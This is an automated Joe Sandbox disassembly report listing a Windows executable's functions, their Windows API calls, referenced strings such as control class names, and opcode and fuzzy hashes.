                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D37896,?,?,00000000), ref: 00CD5A2C
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D37896,?,?,00000000,?,?), ref: 00CD5A50
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 8e741a1ffab4e847ec465b830bc6627729ef541ed1657568955799e22ba2dae2
                                                            • Instruction ID: c83bb5d4144e0da646a445b0a9855cf11d55e45286456a16aaa2c8461f4b86d4
                                                            • Opcode Fuzzy Hash: 8e741a1ffab4e847ec465b830bc6627729ef541ed1657568955799e22ba2dae2
                                                            • Instruction Fuzzy Hash: C7512835A00609DFCB00EFA8C4859ADB7F5FF19320B188066E959AB312D731ED45DFA1
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D3E61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00D3E648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D3E687
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D3E6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D3E6B4
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: 1ba0cce61b95befe5249fc0b66aaa66c81c637671bbc0ffa3e44e4e828bb1ee1
                                                            • Instruction ID: 5e63f8bdb47b7d85d3d08844c8602dad2210dd55ccd5b4352af47acdeb4cff06
                                                            • Opcode Fuzzy Hash: 1ba0cce61b95befe5249fc0b66aaa66c81c637671bbc0ffa3e44e4e828bb1ee1
                                                            • Instruction Fuzzy Hash: 46512F79A00205DFCB01EF64C9819AEBBF5EF09714F148495E949AB3A2CB31ED11EF61
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00CD2357
                                                            • ScreenToClient.USER32(00D957B0,?), ref: 00CD2374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00CD2399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 00CD23A7
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 9d2d80753e724263aac8c3e166bb3b8837c2617a8f07758f52ea6e13962752f4
                                                            • Instruction ID: 67398c054659ebfa3a7ccda4c413e1e4a468762f2144cc06879b9eee5110097f
                                                            • Opcode Fuzzy Hash: 9d2d80753e724263aac8c3e166bb3b8837c2617a8f07758f52ea6e13962752f4
                                                            • Instruction Fuzzy Hash: 9F418E75608205FBCF259F68C844AEDBB78FB15360F20431AF939972E0C7359954EBA1
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D263E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00D26433
                                                            • TranslateMessage.USER32(?), ref: 00D2645C
                                                            • DispatchMessageW.USER32(?), ref: 00D26466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D26475
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: ab5c2d7d13c94732864f382a2061a70b45f67fb618c09fd34ffb278b2407b93b
                                                            • Instruction ID: 9223e143f76e5397aa213ea4ad47520a1ac0a47ad52b4fe8ef2c3435d4d4255f
                                                            • Opcode Fuzzy Hash: ab5c2d7d13c94732864f382a2061a70b45f67fb618c09fd34ffb278b2407b93b
                                                            • Instruction Fuzzy Hash: 6931B431904766DFDB25DFB0FC44BA67BA8AB21308F180176E5A1C62A4E735D44AD770
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00D28A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00D28ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D28AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00D28AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D28AF8
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 35a995d492b10ab0b35c9f0b3d43e461f584ea928b56912d2c2291d88f6bd02a
                                                            • Instruction ID: 80ec06694c4ad42f989309b146db1f8dae619f6c2773cb6d9e89cccc9c5c2d53
                                                            • Opcode Fuzzy Hash: 35a995d492b10ab0b35c9f0b3d43e461f584ea928b56912d2c2291d88f6bd02a
                                                            • Instruction Fuzzy Hash: 4631C271501329EBDF14CF68E94CA9E3BB5FB1431AF144229F925EB2D0CBB09914DBA0
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5B192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00D5B1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D5B1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 00D5B1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00D40E90,00000000), ref: 00D5B216
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 8264b35339d575d4e838023908a8d7bc83e6758f3a1d997d14f0e74cf579d182
                                                            • Instruction ID: c84156c2838c82bcc7b2024b1a9b42385cceae3c2f234b5a250eeee8bd7dc744
                                                            • Opcode Fuzzy Hash: 8264b35339d575d4e838023908a8d7bc83e6758f3a1d997d14f0e74cf579d182
                                                            • Instruction Fuzzy Hash: 4E217C71A10755AFCF109F38DC18A6A3BA4EB05372F14463ABD62D72E0E73098148BB0
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 00D45A6E
                                                            • GetForegroundWindow.USER32 ref: 00D45A85
                                                            • GetDC.USER32(00000000), ref: 00D45AC1
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00D45ACD
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00D45B08
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: f3358b732c461addce2ae0015c9b38f2d4b8c036c90665ebfb0baae17b7412d4
                                                            • Instruction ID: f255ba210a2e8ce0c2a4be4a00ee69827651e621d6894c734e874b7e6d69d186
                                                            • Instruction Fuzzy Hash: 5C218175A00304AFD714EF69DC89AAABBE5EF48351F148479F949D7362CB70AD00DBA0
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00CD134D
                                                            • SelectObject.GDI32(?,00000000), ref: 00CD135C
                                                            • BeginPath.GDI32(?), ref: 00CD1373
                                                            • SelectObject.GDI32(?,00000000), ref: 00CD139C
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 4d2b0531bdd08902f4b57a25eea4cae3661a4f7623cfe990d5beef594b6a42c0
                                                            • Instruction ID: f7fe3d8e75309d9f2d7e2cbf296360ce96c3b31973f82dac2b2f2688e6a74e3f
                                                            • Instruction Fuzzy Hash: 1F214A70801709EBDB129F29EC487697BA8AB10322F584227F914DA3B4D7719991DBA0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D34ABA
                                                            • __beginthreadex.LIBCMT ref: 00D34AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00D34AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D34B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D34B0A
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 2abeb3227514848965cecfed513d09e14f751ac58b4da2e43df2f17255cc4405
                                                            • Instruction ID: 8595497601d950880242aa1496747a572f1a24152dd731e7ddcd1f664de33ed4
                                                            • Instruction Fuzzy Hash: 4F110476905708BFDB019FA8AC08A9B7FACEB45321F18426AFC24D3350D675D90487B0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D2821E
                                                            • GetLastError.KERNEL32(?,00D27CE2,?,?,?), ref: 00D28228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00D27CE2,?,?,?), ref: 00D28237
                                                            • HeapAlloc.KERNEL32(00000000,?,00D27CE2,?,?,?), ref: 00D2823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D28255
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: f2d13b0e29bc4ae66ba86b9aa1cf8fb6274ce8b30a2090e5535aac1b6a3cc78b
                                                            • Instruction ID: 1b8094806a2c9301971bbb9734e72930c84964ef0230bb5d22afc49d6ea93e93
                                                            • Instruction Fuzzy Hash: EF016D71202714FFDB204FA5EC48D6B7BACEF9A759B500469FC49C7220DA318C00DA70
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?,?,00D27455), ref: 00D27127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?), ref: 00D27160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D2716C
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 039dcac53e2dec63a02489b7c53203e8f4d873d6d5b0c6aca1450565017bb644
                                                            • Instruction ID: af0ce41b491c624e63557bedbdcb53ec5cb0bf6e87025b9680c079b2514b841c
                                                            • Instruction Fuzzy Hash: 60017CB2A01324ABDB224F64EC44AAA7BADEF54796F141064FD08D6320D731DD509BB0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D35260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D3526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D35276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D35280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 40754043a65d93bd683a34186a0968be4d5a011989ed0943ae4f43558a37816d
                                                            • Instruction ID: 157bea23f6019258dd3a2f2d397748d7958ceb41a81b97715579e4a64310460b
                                                            • Instruction Fuzzy Hash: 02011735D01B19DBCF00EFE4E849AEEBB78FB09712F400556E985F6294CB7095508BB9
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D28121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D2812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D2813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28157
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: a33b22ed12a327f1fdcf1ea8e9833e35d29ad50ab311e44156e3fd5286e7e984
                                                            • Instruction ID: 73e6cbf9040a1815fb3d5a6a8f9447e44fdb5497690e14b777af160591b9b240
                                                            • Instruction Fuzzy Hash: D6F06871201324AFEB110F65EC8DE673BACFF55759B040025F985C7290CF619D51DA70
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00D2C1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D2C20E
                                                            • MessageBeep.USER32(00000000), ref: 00D2C226
                                                            • KillTimer.USER32(?,0000040A), ref: 00D2C242
                                                            • EndDialog.USER32(?,00000001), ref: 00D2C25C
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 8c88fbb75a37bb55695564ef5508b4c99e139408f9a88c9a2a7e5cafb5cab145
                                                            • Instruction ID: 9c49aedb87ebc170fe8c80fca4e2739b71ab13aeaa1f8053ded9a9e591509592
                                                            • Instruction Fuzzy Hash: 3B01A730414314A7EB206B60ED4EF9677B8FF10707F040269A982D55E0DBF0AD449BA4
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 00CD13BF
                                                            • StrokeAndFillPath.GDI32(?,?,00D0B888,00000000,?), ref: 00CD13DB
                                                            • SelectObject.GDI32(?,00000000), ref: 00CD13EE
                                                            • DeleteObject.GDI32 ref: 00CD1401
                                                            • StrokePath.GDI32(?), ref: 00CD141C
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: b478984878634940cfc2ec5034c1c939987879006bbc88f872cc21683f9d1f5f
                                                            • Instruction ID: 31d6bc36f153daf80b1827f0646e02b7b1bd7278b470f354eaed7f16388459cf
                                                            • Instruction Fuzzy Hash: 6DF0C930005B08EBDB125F2AEC4C7583BA5A701326F4C8236E929C93F5C7318995DF60
                                                            APIs
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00CD7A51: _memmove.LIBCMT ref: 00CD7AAB
                                                            • __swprintf.LIBCMT ref: 00CE2ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00CE2D66
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: d63e4f45db6ee4f65be5d1c03e7347e942efadffc45a4f4550475e4d39182dfb
                                                            • Instruction ID: 43164cc1fa48980ad7ead999b328aed51f3d11262b3081fd04cbfc311258eb6b
                                                            • Instruction Fuzzy Hash: 59919C71108251AFC714EF28D885DBFB7A8EF85710F04091EF5959B2A1EB30EE44EB62
                                                            APIs
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                            • CoInitialize.OLE32(00000000), ref: 00D3B9BB
                                                            • CoCreateInstance.OLE32(00D62D6C,00000000,00000001,00D62BDC,?), ref: 00D3B9D4
                                                            • CoUninitialize.OLE32 ref: 00D3B9F1
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: ac3accc78016b3a9a29058f28deec1c0e2f4867015c2bdcdecd742b77f90eeff
                                                            • Instruction ID: 3ac2b35b81cfadf0bd1436e5a53a478ea3b0bd1d3198d4e7848e6f9f72d9d1fc
                                                            • Instruction Fuzzy Hash: 49A167756043059FCB10DF14C884D2ABBE5FF89724F04899AF9999B3A1CB31EC46CBA1
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 00CF50AD
                                                              • Part of subcall function 00D000F0: __87except.LIBCMT ref: 00D0012B
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: 63166b043d155388f962ceb7593b210c340bf46b36f31ab47f8dd58e8f630906
                                                            • Instruction ID: 7526570653ccd2f6d19073ef0a997b45532c0e0f3a16efd2dc8b9bd2f46af871
                                                            • Opcode Fuzzy Hash: 63166b043d155388f962ceb7593b210c340bf46b36f31ab47f8dd58e8f630906
                                                            • Instruction Fuzzy Hash: EC515871A08B0AA6DB516724C90137E2F94DB40700F248D59E7E9C63E9EE748EC49AB7
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: 791c2259b61274b181b17a53ad1d780031abf586ebf444dbb2c5a8d0ada6b057
                                                            • Instruction ID: e701fb0846bdd54c5bcb54fe5120f35856be293ccce4d0a3080d52b4edd3d677
                                                            • Opcode Fuzzy Hash: 791c2259b61274b181b17a53ad1d780031abf586ebf444dbb2c5a8d0ada6b057
                                                            • Instruction Fuzzy Hash: 6251F271900709DFDB24CF66C881BAABBF4EF14344F24856EE99ADB251E770EA40CB50
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D5F910,00000000,?,?,?,?), ref: 00D579DF
                                                            • GetWindowLongW.USER32 ref: 00D579FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D57A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 1e69a003a5a5ff4d26742ee8da8918f25017a8e69f0ecdb249d3b2bba26f788d
                                                            • Instruction ID: befb76314c32f87c4c26d74c5087cfda67a18fcf566aa3c97fbe4a733f27baf9
                                                            • Opcode Fuzzy Hash: 1e69a003a5a5ff4d26742ee8da8918f25017a8e69f0ecdb249d3b2bba26f788d
                                                            • Instruction Fuzzy Hash: DF31BC31204206ABDF118F38EC45BEA77A9EB09325F284725FD79E22E0D730E9549B70
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D57461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D57475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D57499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 285e8f9fc5261af8388c9236f32e1a12ae4d028a3ac4958d6aff48171ddcda37
                                                            • Instruction ID: 8b12a7637dbddaf6776b0cc9112ce7f5d98f8c7021a53730c316f2e432b78d2f
                                                            • Opcode Fuzzy Hash: 285e8f9fc5261af8388c9236f32e1a12ae4d028a3ac4958d6aff48171ddcda37
                                                            • Instruction Fuzzy Hash: FB21BF32600218AFDF118FA4DC42FEA3B6AEB48725F150214FE55AB190DA75AC55DBB0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00D57C4A
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00D57C58
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D57C5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: 1e25207f58f69897dd1a626699f60afb6081ea6a09832d328934fd49c92323ba
                                                            • Instruction ID: f9497e5ed75316c4e296d92e80ea1a68d9b6e130120ac098c9e8c24ba6ef81fe
                                                            • Opcode Fuzzy Hash: 1e25207f58f69897dd1a626699f60afb6081ea6a09832d328934fd49c92323ba
                                                            • Instruction Fuzzy Hash: 01215AB1604208AFDB11DF28ECC1DB637ACEB4A3A5B240059FE119B3A1CA31EC058B70
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D56D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D56D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D56D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 71fa316ed93dae216347762fbcc2fd73ce488770b6e3ba6eb14592e1deab1eab
                                                            • Instruction ID: 70184a6f19e5762947c0d68d69803bbf5b51706bb1f31641b26c593dcdf95d0c
                                                            • Opcode Fuzzy Hash: 71fa316ed93dae216347762fbcc2fd73ce488770b6e3ba6eb14592e1deab1eab
                                                            • Instruction Fuzzy Hash: 9021B032600218BFDF128F54CC45EBB3BBAEB89761F458125FE459B1A0CA71DC558BB0
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D28C6D
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D28C84
                                                            • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00D28CBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: 4c8a63942192852285e2ad2a6aed858ba16a796c2ee6b712181ecf5daa72e8a7
                                                            • Instruction ID: 4c873745b2cb000cc76ccad30bbb7e030f12d42ca536df9f8f2c7e46416a2b88
                                                            • Opcode Fuzzy Hash: 4c8a63942192852285e2ad2a6aed858ba16a796c2ee6b712181ecf5daa72e8a7
                                                            • Instruction Fuzzy Hash: 1C21A472602228BBDB10DBA8D841DAFB7FDEF54354F14045BE905E7250DB71AD40ABB4
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D57772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D57787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D57794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: b87e6eea8a6d813068fe689a199b6ae8b7893156b11758b2bae56c01632c0666
                                                            • Instruction ID: a97a82f721bfc00d3953725c25d08ccb2a28f4cef4be1e5fc79e9d6d715029a0
